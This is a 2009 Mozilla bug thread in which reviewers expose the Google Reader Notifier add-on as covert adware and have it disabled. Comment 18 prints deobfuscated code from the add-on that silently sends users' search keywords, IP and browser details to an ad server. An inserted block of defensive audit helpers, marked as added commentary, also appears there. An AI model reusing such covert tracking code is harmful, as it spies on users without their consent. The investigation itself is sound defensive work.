Bug 504050 - Google Reader Notifier is now adware/spyware; shows text ad in status bar derived from recent search keywords; no notice given (this is a recommended add-on)
Status: RESOLVED FIXED
Product: addons.mozilla.org Graveyard
Classification: Graveyard
Component: Policy
Assigned To: Nobody; OK to take it and work on it
Reported: 2009-07-14 02:33 PDT by Peter Gasston
Modified: 2016-02-04 14:51 PST (History)
Attachments
st_ads.js from extension (8.06 KB, application/x-javascript), 2009-07-14 10:49 PDT, Dave Garrett
st_ads.js made readable with line breaks and auto-indentation (12.11 KB, application/x-javascript), 2009-07-14 10:49 PDT, Dave Garrett

Description Peter Gasston 2009-07-14 02:33:37 PDT
User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5

A clickable link appears in the status bar; when clicked, this opens a new tab and sends the user to a new website, via a website called http://c.vioij.com. In my case I saw links to Ebay UK, but other users have reported different results. See this link for screenshots and more details from another user:

http://www.bernzilla.com/2009/07/14/adware-in-my-firefox-status-bar/

Reproducible: Sometimes
Comment 1 Jo Hermans 2009-07-14 02:55:23 PDT
What add-ons do you have loaded ?
Comment 2 Peter Gasston 2009-07-14 03:54:23 PDT
This has happened on two different machines (Linux & Mac); the add-ons they have in common are:

Yahoo! Mail Notifier
Google Reader Notifier
Gmail Manager

Possibly Firebug, although I can't remember off-hand.
Comment 3 Dave Garrett 2009-07-14 07:00:45 PDT
Checking the AMO pages for each, it's Google Reader Notifier. Its deluge of one star reviews has begun.
https://addons.mozilla.org/en-US/firefox/addon/3977

This is an AMO recommended add-on. I think having explicit ads like this should disqualify that. It doesn't even say it's going to do something like this anywhere, so this is a pretty big problem. Moving over to AMO.
Comment 4 Rey Bango 2009-07-14 07:27:18 PDT
Not sure what happened since as of July 8, 2009, the add-on had received good reviews. I'll check it out to see what's up. Advertising itself isn't a reason not to dismiss an add-on for recommended status but if it's intrusive or adware, then it needs to be evaluated.
Comment 5 Jo Hermans 2009-07-14 07:29:54 PDT
It's not advertising itself - it is loading ads. See http://www.bernzilla.com/2009/07/14/adware-in-my-firefox-status-bar/
Comment 6 Rey Bango 2009-07-14 07:33:26 PDT
(In reply to comment #5)
> It's not advertising itself - it is loading ads. See
> http://www.bernzilla.com/2009/07/14/adware-in-my-firefox-status-bar/

Thanks for putting up the post, Jo. That's a big help.

When I said "Advertising itself", I didn't mean that the add-on is advertising it's "self" but that advertising within an add-on is not against AMO policy. If it's becoming intrusive though, then that's where we need to discuss it with the author. I think we're seeing enough complaints where it merits chatting with him.
Comment 7 Dave Garrett 2009-07-14 07:34:57 PDT
I don't use this service or extension and as of yet haven't figured out a way to get it to actually show the ads.

I'm taking a look at the source now and doing some diffs, and wow, I think I just discovered something creatively evil. There were only two changes from version 0.71 to 0.73: the addition of the ad system and the removal of his name from everything. It used to list Rob Warwick as the author in every file and now that's gone along with the listing in about.xul. Either this was sold or he just doesn't want his name to be associated with this. The really sneaky part that I think I just uncovered, is that version 0.73 is listed as experimental and is two versions old. I diffed 0.73 to the next version, 0.74, and then again to the current public version 0.76: the ONLY changes made here are to the version number in the install.rdf. I think they were created explicitly to get past editor review by making the diffs show no changes to the last version when requesting public status for the latest file. That's the only reason I can think of to post changeless versions like this. If it's not, anyone got an idea that makes more sense?
Comment 8 Dave Garrett 2009-07-14 07:43:12 PDT
(In reply to comment #6)
> advertising within an add-on is not against AMO policy.

No, but I do think it should be against AMO policy for recommended add-ons. Mozilla shouldn't be recommending adware.

Also, this is done without even so much as a EULA so it's completely unknown to the user who installs this until it eventually starts showing.
Comment 9 Rey Bango 2009-07-14 07:45:25 PDT
Thanks for vetting this Dave. The way our diff tool works is that it compares the latest submitted update (which is status experimental) against the current public version. So 0.76 would've been compared to 0.71 with our diff tool.
Comment 10 Rey Bango 2009-07-14 07:46:15 PDT
(In reply to comment #8)
> (In reply to comment #6)
> > advertising within an add-on is not against AMO policy.
> 
> No, but I do think it should be against AMO policy for recommended add-ons.
> Mozilla shouldn't be recommending adware.
> 
> Also, this is done without even so much as a EULA so it's completely unknown to
> the user who installs this until it eventually starts showing.

Dave, do you really think I would've recommended an add-on if I thought it was adware? Seriously, give me some credit.
Comment 11 Dave Garrett 2009-07-14 07:50:13 PDT
(In reply to comment #10)
> Dave, do you really think I would've recommended an add-on if I thought it was
> adware? Seriously, give me some credit.

Oh, sorry, I'm not saying that. This was a highly respected add-on for a long time before all this. It just slipped through somehow after the fact. I'm just noting that it is recommended and I don't think any of us would want a recommended adware add-on.
Comment 12 Dave Garrett 2009-07-14 07:52:37 PDT
By the way, I just filed a little bug for the odd choice of homepage and support URLs. (bug 504082) Quite dumb looking to list the current page as the URL for these...
Comment 13 Rey Bango 2009-07-14 08:50:05 PDT
I've emailed the author to find out what's happening. These complaints have only started occurring in the last 4 days so I want to determine what changed. As Dave mentioned, it's possible that it could be an ownership change or perhaps the author genuinely didn't think this was intrusive. I'll be asking an editor to do a full code review and working towards resolving this quickly.
Comment 14 Dave Garrett 2009-07-14 08:59:49 PDT
Is there any policy on extensions having obfuscated or otherwise not-human-readable code in them? The st_ads.js file is a single line blob of JavaScript with simplistic variable names. Not easy to read even after find/replaces and auto-indentation. Makes trying to figure out what this actually does hard.
Comment 15 Rey Bango 2009-07-14 09:11:05 PDT
@Dave: Yep there is. Obfuscated code is allowed in a final, uploaded version on AMO but the code needs to be reviewed prior to being approved. I'm looking up who reviewed the code so I can discuss this with the editor. I'm doing some homework on my end as well, as usually ad-supported add-ons throw red flags during the review.
Comment 16 Rey Bango 2009-07-14 09:22:26 PDT
I've asked an editor to do a review of the code so hopefully we'll get some answers.
Comment 17 Dave Garrett 2009-07-14 10:04:20 PDT
Also, I thought adding something vaguely useful to the version notes was required? The four versions for this month have nothing.

Ok, this annoyed me so I figured out a little here. First off, there is some sort of grace period before starting to show ads. I figured out how to override it, however. As to what it actually does, it shows targeted advertising based on what search strings it finds in your current URL.

To trigger an ad, do the following:
1) New profile in Firefox 3.5
2) Install Google Reader Notifier 0.76 and restart Firefox
3) Close Google Reader Notifier's options pane and the Add-ons Manager
4) Go to about:config, find "extensions.gbgchanger.start_day" and do right-click->reset
5) Restart Firefox again
6) Go to the home page, which is the default "Firefox Start" Google search, and do a search for "monkey"
7) Your status bar should now have a hyperlink for some ad that is monkey-related.

Note that you can substitute almost any search for Google in step 6. It'll even work on AMO's searches. It just grabs keywords out of a generic search URL with keywords preceded by "q=" and then fetches a list of ads based on it from its server. It doesn't seem to do it every search; it cycles through different items in its list for a while.

At the very least they'd need a privacy policy for what they're doing here.
Comment 18 Dave Garrett 2009-07-14 10:41:37 PDT
Since this is, without permission, forwarding some keywords the user is entering into some searches, this does make it spyware. Private user information, namely what they're searching for on the Internet through various sites, is on occasion being sent to their server without permission or notice in order to procure these ads.

The relevant block of code from st_ads.js (made vaguely readable through auto-indenting and whatnot):
    onLocationChange:function(aWebProgress,aRequest,aLocation)
    {
        var J='';
        var D='';
        if(st_ads.P==1)return;
        if(aLocation)
        {
            var url=escape(aLocation.spec);
            if(url!=null)
            {
                var o="";
                var ai=st_ads.A("ListData");
                if(ai.length>0)
                {
                    var nextList=st_ads.A("NextList");
                    if(Date.now()<nextList)
                    {
                        o=ai;
                    }
                }
                if(o.length==0)
                {
                    req=new c("http://f.pnxml.com/");
                    req.add('pid','xgen');
                    req.add('fid','294');
                    req.add('user_ip',st_ads.ag);
                    req.add('user_agent',escape(navigator.userAgent));
                    var T=aLocation.spec.indexOf("q=");
                    if(T== -1)
                    {
                        st_ads.G('','','','','');
                        return;
                    }
                    var ae=aLocation.spec.indexOf('&',T);
                    if(ae== -1)ae=aLocation.spec.length;
                    var keyword=aLocation.spec.substr(T+2,ae-T-2);
                    req.add('keyword',keyword);
                    req.add('referer',escape("http://www.targetedfind.com/product/search/"+keyword));
                    ah=keyword;
                    o=req.execute();
                    st_ads.C("ListData",o);
                    st_ads.C("NextList",Date.now()+st_ads.O*1000);
                }
                var randomnumber=Math.floor(Math.random()*101);
                var use=0;
                if(randomnumber>=60&&randomnumber<85)use=1;
                if(randomnumber>=85)use=2;
                J=st_ads.Q(o,"title",use);
                J=J.replace(/(<([^>]+)>)/ig,"");
                D=st_ads.Q(o,"click_url",use);
                var F=st_ads.Q(o,"description",use).replace(/(<([^>]+)>)/ig,"");
                F=F.replace("&","&amp;");
                var L='';
                var caption=st_ads.Q(o,"display_url",use);
                caption=caption.replace(/(<([^>]+)>)/ig,"");
                st_ads.G(J,D,F,L,caption);
            }
        }
    },

This observer was set to listen on page loads on startup. "req.execute()" does "j()" which generates an XMLHttpRequest for the given parameters.
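As an added illustration (not code from the extension or from anyone in this thread), the helpers below reproduce the observer's keyword extraction so a reviewer can see exactly what a given URL would leak, and flag the source-level traits raised in comments 14, 17 and 18. The ad hostnames come from the thread; the sample URLs and the stand-in source string are constructed, and the audit heuristics are my own, not an AMO tool.

```javascript
// Added example, not part of the bug report or the extension.
// Mirror the observer's keyword extraction: the first "q=" anywhere in the
// raw URL, up to the next "&". This is the string the extension would send to
// the ad server, so running it over a history export shows the scope of the
// leak. Returns null where the observer would instead send an empty request.
function leakedKeyword(url) {
  const t = url.indexOf("q=");
  if (t === -1) return null;
  let ae = url.indexOf("&", t);
  if (ae === -1) ae = url.length;
  return url.substr(t + 2, ae - t - 2);
}

// Stricter check for comparison: does the URL really carry a "q" parameter?
// The extension's substring search is not anchored on a parameter boundary,
// so URLs containing "seq=", "freq=" and the like also trigger a request.
function hasRealQueryParam(url) {
  try {
    return new URL(url).searchParams.has("q");
  } catch (e) {
    return false; // not an absolute URL (e.g. about:blank)
  }
}

// Static indicators discussed in the thread: a one-line minified blob, a
// location observer, a "q=" substring scan, network calls, and the ad hosts.
const AD_HOSTS = ["f.pnxml.com", "c.vioij.com", "targetedfind.com"];

function auditExtensionSource(source) {
  const lines = source.split("\n").filter((l) => l.trim().length > 0);
  const findings = [];
  if (lines.length <= 2 && source.length > 2000) findings.push("single-line-blob");
  if (/onLocationChange\s*:/.test(source)) findings.push("location-observer");
  if (/indexOf\(["']q=["']\)/.test(source)) findings.push("search-keyword-scrape");
  if (/XMLHttpRequest|\.execute\(\)/.test(source)) findings.push("network-call");
  for (const h of AD_HOSTS) if (source.includes(h)) findings.push("ad-host:" + h);
  return findings;
}

// Constructed stand-in for the observer above (not the real st_ads.js).
const SAMPLE_SOURCE =
  'onLocationChange:function(a,b,c){var T=c.spec.indexOf("q=");' +
  'req=new c("http://f.pnxml.com/");o=req.execute();}';
```

Running leakedKeyword over a day of browsing history is the quickest way to show a user which of their queries would have left the machine.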
Comment 19 Dave Garrett 2009-07-14 10:49:14 PDT
Created attachment 388502 [details]
st_ads.js from extension
Comment 20 Dave Garrett 2009-07-14 10:49:39 PDT
Created attachment 388503 [details]
st_ads.js made readable with line breaks and auto-indentation

In case anyone else would care to take a look.
Comment 21 Rey Bango 2009-07-14 10:58:24 PDT
Thanks for outlining the steps Dave. I was able to duplicate the issue as well.
Comment 22 Dave Garrett 2009-07-14 11:11:16 PDT
If anyone would like to take a look at the attached, please do, as I have no idea what some of this crap is doing. It references a non-existent "chrome://gbgchanger/content/message.xul" at one point. After Googling "gbgchanger" I came up with the Google Background Changer which seems to be a Firefox extension to add a wallpaper for Google:
http://www.coolbrowsers.com/Google-Background-Changer.php

I checked in its XPI and it has its own st_ads.js, with normal function names, line breaks, and indentation. It actually has its message.xul which is a popup that says: "You have a special internet search software which gives you additional search results in your status bar. You can turn this on or off at any time. If you would like to turn it off please click here". So it appears that the implementation of all this was taken from somewhere else, modified a bit, obfuscated somewhat, and dumped into here. One of the modifications seems to be the lack of user interaction, which gbgchanger did actually have.
Comment 23 Rey Bango 2009-07-14 11:19:31 PDT
Thanks for doing all of this investigating. After seeing what you've dug up plus our testing, we've decided to sandbox the add-on until further notice. There are just too many "what ifs" at the moment. I'll work with the developer to determine their thought process as well as improving the implementation of advertising, if that's the route he wants to take.
Comment 24 Brian King [:kinger] 2009-07-15 09:55:59 PDT
I pretty much agree with Dave's diagnosis here, esp. comments 17, 18 and 22. 

I also agree with it being sandboxed and it should remain that way until the developer replies.
Comment 25 Dave Garrett 2009-07-15 11:39:23 PDT
Thanks. Hopefully the developer will come up with a better solution.

If the developer really does want to do ads I do hope that this method is thrown out the window. Not only are there big privacy issues with this method, but frankly, it's confusing. Does anyone actually believe that even if some users would put up with such a thing that they'd be frequently inclined to click on a tiny 3 word link with no information, even if it was targeted-ish? What's worse, if it actually did work then others will try to do the same thing in their extensions. So if this was allowed, then we end up with a user installing half a dozen extensions all doing this and fighting over status bar space, and this is all assuming they were bright enough to use new IDs and don't just cause conflicts and errors. It's just not practical.
Comment 26 Dave Garrett 2009-07-24 07:27:13 PDT
Was there ever a reply from the developer? Also, what did the editor say about the initial review?
Comment 27 Rey Bango 2009-07-24 09:58:46 PDT
I'm still working with them on this. I'll update when we have a good resolution.
Comment 28 Dave Garrett 2009-07-24 11:46:05 PDT
Out of curiosity, did you find out if this was done by the original developer or if it was sold to someone else?
Comment 29 Rey Bango 2009-07-24 12:21:17 PDT
Yep. It's still owned by the original developer. They were just exploring monetization ideas.
Comment 30 Fred Wenzel [:wenzel] 2009-08-11 07:13:03 PDT
Rey: Has this been resolved?
Comment 31 Rey Bango 2009-08-11 09:10:01 PDT
No they've not resolved it which is why it remains experimental.
Comment 32 Fred Wenzel [:wenzel] 2009-08-11 09:15:40 PDT
Ah, sorry I overlooked that. You can leave the bug open or close it fixed then, if you like.
Comment 33 Rey Bango 2009-08-11 09:34:58 PDT
I'm going to email the developer one last time. If they're not interested in correcting this, then I'll update the bug and take it from there. Thanks for checking in Fred :)
Comment 34 Ben Sizer 2009-10-06 02:22:44 PDT
Is there any prospect of a change to the system here? It was discovered that this was adware/spyware almost 3 months ago but users like myself have had it installed all this time. My ads started showing 2 days ago and a web search eventually led me here. No doubt others are in the same boat? Perhaps one approach would have been to implement a final update that inserted a warning message box somewhere to let us choose to uninstall it.

And aren't updates to recommended extensions on AMO vetted? It's very concerning that I can install an add-on from mozilla.org which later updates to put malign code on my computer. Even just things like him being able to remove the author field from install.rdf is very suspect. That sounds like a problem in the process because there should always be accountability.
Comment 35 Rey Bango 2009-10-06 08:51:02 PDT
@Ben: We review every add-on nomination & update submitted through AMO. In fact, we've done over 6,000 reviews this year surpassing last year's count of ~5,700 reviews. Can something be accidentally overlooked? I would have to say "yes" as our editors are human & it's conceivable that a mistake could occur. Ultimately, though, we do our best to catch these situations.

In this case, it was unfortunately well-hidden and the editorial team has been asked to scrutinize add-on code more closely. 

I'm closing this bug since the add-on has been disabled on AMO but you can still post comments if you'd like or email me at rey@mozilla.com.
